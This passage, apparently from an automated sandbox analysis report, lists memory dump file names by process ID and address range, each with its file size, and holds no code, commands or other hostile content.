                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            892KB

                                                                                                                                                                                                                                                                                          • memory/4672-465-0x0000000004DC0000-0x0000000004E6B000-memory.dmp

                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            684KB

                                                                                                                                                                                                                                                                                          • memory/4696-638-0x0000000000030000-0x0000000000033000-memory.dmp

                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            12KB

                                                                                                                                                                                                                                                                                          • memory/4704-315-0x00000264A5000000-0x00000264A5072000-memory.dmp

                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            456KB

                                                                                                                                                                                                                                                                                          • memory/4704-312-0x00000264A4E40000-0x00000264A4E42000-memory.dmp

                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                                          • memory/4704-310-0x00000264A4E40000-0x00000264A4E42000-memory.dmp

                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                                          • memory/4704-470-0x00000264A4EA0000-0x00000264A4EBB000-memory.dmp

                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            108KB

                                                                                                                                                                                                                                                                                          • memory/4704-471-0x00000264A7790000-0x00000264A7895000-memory.dmp

                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            1.0MB

                                                                                                                                                                                                                                                                                          • memory/4984-603-0x0000000004BC0000-0x0000000004C6B000-memory.dmp

                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            684KB